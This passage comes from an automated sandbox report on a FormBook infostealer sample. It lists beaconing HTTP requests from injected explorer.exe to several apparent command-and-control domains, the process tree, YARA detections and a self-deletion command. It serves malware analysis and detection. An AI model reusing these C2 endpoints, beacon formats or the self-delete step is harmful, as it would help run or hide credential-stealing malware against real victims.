                                              Nov 25, 2021 17:49:40.756764889 CET6722OUTGET /e8ia/?iXg8nxg=XTCOm0O2ezcXVHmIGYJnNvyPH+9cp28MuHIwWYLOKrNEhJt2q4EPucT34N3PnC3WtYmv&xTh4=5jvdevo8uz HTTP/1.1
                                              Host: www.yesrecompensas.lat
                                              Connection: close
                                              Data Raw: 00 00 00 00 00 00 00
                                              Data Ascii:
                                              Nov 25, 2021 17:49:40.862773895 CET6722INHTTP/1.1 301 Moved Permanently
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 16:49:40 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Content-Length: 89
                                              Connection: close
                                              X-date: 2021-11-23T23:37:01+00:00
                                              Expires: Tue, 30 Nov 2021 23:37:01 +0000
                                              Cache-Control: public, max-age=604800
                                              Location: http://yesrecompensas.com.mx
                                              X-Xss-Protection: 1; mode=block
                                              X-Frame-Options: SAMEORIGIN
                                              X-Content-Type-Options: nosniff
                                              X-Cached: HIT
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 20 6f 6e 6c 6f 61 64 3d 22 64 6f 63 75 6d 65 6e 74 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 79 65 73 72 65 63 6f 6d 70 65 6e 73 61 73 2e 63 6f 6d 2e 6d 78 27 22 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                              Data Ascii: <html><body onload="document.location.href='http://yesrecompensas.com.mx'"></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              1192.168.2.449783172.67.158.4280C:\Windows\explorer.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 17:49:45.949994087 CET7577OUTGET /e8ia/?iXg8nxg=yTyv9O3Jw5UvaSzklMNiw9yfcYAnwywQ+wyeDsCSdfwJ085LpTTX32oK1L+zNF/muuyB&xTh4=5jvdevo8uz HTTP/1.1
                                              Host: www.gadget198.xyz
                                              Connection: close
                                              Data Raw: 00 00 00 00 00 00 00
                                              Data Ascii:
                                              Nov 25, 2021 17:49:45.980499029 CET7578INHTTP/1.1 301 Moved Permanently
                                              Date: Thu, 25 Nov 2021 16:49:45 GMT
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              Cache-Control: max-age=3600
                                              Expires: Thu, 25 Nov 2021 17:49:45 GMT
                                              Location: https://www.gadget198.xyz/e8ia/?iXg8nxg=yTyv9O3Jw5UvaSzklMNiw9yfcYAnwywQ+wyeDsCSdfwJ085LpTTX32oK1L+zNF/muuyB&xTh4=5jvdevo8uz
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=693LmV%2Bw32mJLpz0CjLHpA9CmAqDZ3cBnMrgJPBsLZg3VlXc5o0F7BW0NUSneKFXoV86CV%2FB1SSCUpaP71S1BwtoQ1W6xgQpIeSLasN96ZbuxmIXWd023SoZO7OzNb6p00iwFg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 6b3c5f464ee52488-FRA
                                              alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                              Data Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              2192.168.2.449784213.186.33.580C:\Windows\explorer.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 17:49:51.119391918 CET7579OUTGET /e8ia/?iXg8nxg=uzdrQi2cv+ipXcIIFlALJKSYThDDC/wlQTE6b69ZsR3gT5zSedzJyJgP4QFwrZDAKX1z&xTh4=5jvdevo8uz HTTP/1.1
                                              Host: www.le-hameau-enchanteur.com
                                              Connection: close
                                              Data Raw: 00 00 00 00 00 00 00
                                              Data Ascii:
                                              Nov 25, 2021 17:49:51.146656990 CET7580INHTTP/1.1 302 Moved Temporarily
                                              server: nginx
                                              date: Thu, 25 Nov 2021 16:49:51 GMT
                                              content-type: text/html
                                              content-length: 138
                                              location: http://www.le-hameau-enchanteur.com
                                              x-iplb-request-id: 5411343F:C278_D5BA2105:0050_619FBEAF_1984DF61:1C785
                                              x-iplb-instance: 16980
                                              set-cookie: SERVERID77446=200173|YZ++s|YZ++s; path=/; HttpOnly
                                              connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              3192.168.2.449785151.139.128.1180C:\Windows\explorer.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 17:49:56.399925947 CET7581OUTGET /e8ia/?iXg8nxg=Y16Z63O1gty4jexpGTflGuIz4Gugt4GYAlGZJQf+kV2UdFWHFdKuPaLe5BRm7+ulCaVU&xTh4=5jvdevo8uz HTTP/1.1
                                              Host: www.henleygirlscricket.com
                                              Connection: close
                                              Data Raw: 00 00 00 00 00 00 00
                                              Data Ascii:
                                              Nov 25, 2021 17:49:56.444983959 CET7582INHTTP/1.1 200 OK
                                              Date: Thu, 25 Nov 2021 16:49:56 GMT
                                              Cache-Control: no-store, no-cache, max-age=0, must-revalidate, private, max-stale=0, post-check=0, pre-check=0
                                              Transfer-Encoding: chunked
                                              Content-Type: text/html; charset=UTF-8
                                              Set-Cookie: SPSI=f9ebd8c7b9ab11e4eabd2cfd107b74f6; path=/; HttpOnly; SameSite=Lax;
                                              Set-Cookie: SPSE=jB5wJrLCb5L3BCZV1tOG+b6YamHO2pIF5C6Yl5YG8SpYlBnGa8pQ668eabPu/dm7tdPEIiCzYkZ5CkO7l5whMA==; path=/; HttpOnly; SameSite=Lax;
                                              Set-Cookie: spcsrf=b9a5b2e19df40b785f85ce4477824e3c; path=/; SameSite=Strict; HttpOnly; expires=Thu, 25-Nov-21 18:49:56 GMT
                                              Set-Cookie: adOtr=obsvl; path=/; SameSite=Lax; expires=Thu, 2 Aug 2001 20:47:11 UTC
                                              Set-Cookie: UTGv2=D-h4a7d56b29c1428a99096986a481fb2c3e64; path=/; SameSite=Lax; expires=Tue, 24-May-22 16:49:56 GMT
                                              Server: fbs
                                              X-Accel-Expires: 0
                                              X-HW: 1637858996.cds084.am5.h2,1637858996.cds007.am5.sc,1637858996.cdn2-wafbe02-ams1.stackpath.systems.-.w,1637858996.cds007.am5.p
                                              Access-Control-Allow-Origin: *
                                              Connection: close


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              4192.168.2.449798198.54.125.5680C:\Windows\explorer.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 17:50:01.748836994 CET7906OUTGET /e8ia/?iXg8nxg=PAc72DwZO0aWTT/MjmPIYr+XMy4z+KuKlzNTRujTlx9pyna9MI4XbiRkWDekRXBmxfjs&xTh4=5jvdevo8uz HTTP/1.1
                                              Host: www.webartsolution.net
                                              Connection: close
                                              Data Raw: 00 00 00 00 00 00 00
                                              Data Ascii:
                                              Nov 25, 2021 17:50:01.915517092 CET7909INHTTP/1.1 301 Moved Permanently
                                              keep-alive: timeout=5, max=100
                                              content-type: text/html
                                              content-length: 707
                                              date: Thu, 25 Nov 2021 16:50:01 GMT
                                              server: LiteSpeed
                                              location: https://www.webartsolution.net/e8ia/?iXg8nxg=PAc72DwZO0aWTT/MjmPIYr+XMy4z+KuKlzNTRujTlx9pyna9MI4XbiRkWDekRXBmxfjs&xTh4=5jvdevo8uz
                                              x-turbo-charged-by: LiteSpeed
                                              connection: close
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 33 30 31 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 62 65 65 6e 20 70 65 72 6d 61 6e 65 6e 74 6c 79 20 6d 6f 76 65 64 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              5192.168.2.44982037.123.118.15080C:\Windows\explorer.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 17:50:07.020860910 CET8384OUTGET /e8ia/?iXg8nxg=pR2xmGsT/5nillNQjkLQ+n9+6iNIwMBz7svLGcpZWnNs4I/1r36jcwvV3IT8Xqaw6HRS&xTh4=5jvdevo8uz HTTP/1.1
                                              Host: www.blttsperma.quest
                                              Connection: close
                                              Data Raw: 00 00 00 00 00 00 00
                                              Data Ascii:
                                              Nov 25, 2021 17:50:07.050486088 CET8385INHTTP/1.1 403 Forbidden
                                              Server: nginx/1.10.3 (Ubuntu)
                                              Date: Thu, 25 Nov 2021 16:50:07 GMT
                                              Content-Type: text/html
                                              Content-Length: 178
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 30 2e 33 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx/1.10.3 (Ubuntu)</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              6192.168.2.449824143.95.80.6580C:\Windows\explorer.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 17:50:17.640515089 CET8395OUTGET /e8ia/?iXg8nxg=OP/FDNHzL21SrAXHedPkfpmrZidd0Yb29DNAw19ZtZADeK9OL3CpiCl5COoBoa9aFzWI&xTh4=5jvdevo8uz HTTP/1.1
                                              Host: www.intelldat.com
                                              Connection: close
                                              Data Raw: 00 00 00 00 00 00 00
                                              Data Ascii:
                                              Nov 25, 2021 17:50:17.792484999 CET8396INHTTP/1.1 500 Internal Server Error
                                              Date: Thu, 25 Nov 2021 16:50:17 GMT
                                              Server: Apache
                                              Content-Length: 7309
                                              Connection: close
                                              Content-Type: text/html
                                              Data Raw: 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 35 30 39 20 42 61 6e 64 77 69 64 74 68 20 4c 69 6d 69 74 20 45 78 63 65 65 64 65 64 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 42 61 6e 64 77 69 64 74 68 20 4c 69 6d 69 74 20 45 78 63 65 65 64 65 64 3c 2f 48 31 3e 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>509 Bandwidth Limit Exceeded</TITLE></HEAD><BODY><H1>Bandwidth Limit Exceeded</H1>


                                              Code Manipulations

                                              Statistics

                                              Behavior

                                              Click to jump to process

                                              System Behavior

                                              Analysis Process: TT COPY_02101011.exe PID: 6584 Parent PID: 5864

                                              General

                                              Start time:17:48:22
                                              Start date:25/11/2021
                                              Path:C:\Users\user\Desktop\TT COPY_02101011.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\Desktop\TT COPY_02101011.exe"
                                              Imagebase:0x400000
                                              File size:309491 bytes
                                              MD5 hash:EBABC0D66A9E01CC0926F3B311FEFF5F
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.681771508.0000000002A30000.00000004.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.681771508.0000000002A30000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.681771508.0000000002A30000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              Reputation:low

                                              Analysis Process: TT COPY_02101011.exe PID: 6644 Parent PID: 6584

                                              General

                                              Start time:17:48:24
                                              Start date:25/11/2021
                                              Path:C:\Users\user\Desktop\TT COPY_02101011.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\Desktop\TT COPY_02101011.exe"
                                              Imagebase:0x400000
                                              File size:309491 bytes
                                              MD5 hash:EBABC0D66A9E01CC0926F3B311FEFF5F
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000000.678695339.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000000.678695339.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000000.678695339.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000001.680245219.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000001.680245219.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000001.680245219.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000000.679558330.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000000.679558330.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000000.679558330.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.742624387.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.742624387.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.742624387.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.743981788.00000000005B0000.00000040.00020000.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.743981788.00000000005B0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.743981788.00000000005B0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.744409415.00000000005E0000.00000040.00020000.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.744409415.00000000005E0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.744409415.00000000005E0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                              Reputation:low

                                              Analysis Process: explorer.exe PID: 3424 Parent PID: 6644

                                              General

                                              Start time:17:48:28
                                              Start date:25/11/2021
                                              Path:C:\Windows\explorer.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\Explorer.EXE
                                              Imagebase:0x7ff6fee60000
                                              File size:3933184 bytes
                                              MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000000.732659065.000000000F349000.00000040.00020000.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000000.732659065.000000000F349000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000000.732659065.000000000F349000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000000.717484529.000000000F349000.00000040.00020000.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000000.717484529.000000000F349000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000000.717484529.000000000F349000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                              Reputation:high

                                              Analysis Process: autoconv.exe PID: 6712 Parent PID: 3424

                                              General

                                              Start time:17:48:52
                                              Start date:25/11/2021
                                              Path:C:\Windows\SysWOW64\autoconv.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\SysWOW64\autoconv.exe
                                              Imagebase:0xef0000
                                              File size:851968 bytes
                                              MD5 hash:4506BE56787EDCD771A351C10B5AE3B7
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:moderate

                                              Analysis Process: NETSTAT.EXE PID: 744 Parent PID: 3424

                                              General

                                              Start time:17:48:53
                                              Start date:25/11/2021
                                              Path:C:\Windows\SysWOW64\NETSTAT.EXE
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\SysWOW64\NETSTAT.EXE
                                              Imagebase:0xea0000
                                              File size:32768 bytes
                                              MD5 hash:4E20FF629119A809BC0E7EE2D18A7FDB
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.935086898.0000000000CC0000.00000040.00020000.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.935086898.0000000000CC0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.935086898.0000000000CC0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.934914416.0000000000760000.00000040.00020000.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.934914416.0000000000760000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.934914416.0000000000760000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.935144259.0000000000CF0000.00000004.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.935144259.0000000000CF0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.935144259.0000000000CF0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              Reputation:moderate

                                              Analysis Process: cmd.exe PID: 7080 Parent PID: 744

                                              General

                                              Start time:17:48:57
                                              Start date:25/11/2021
                                              Path:C:\Windows\SysWOW64\cmd.exe
                                              Wow64 process (32bit):true
                                              Commandline:/c del "C:\Users\user\Desktop\TT COPY_02101011.exe"
                                              Imagebase:0x11d0000
                                              File size:232960 bytes
                                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
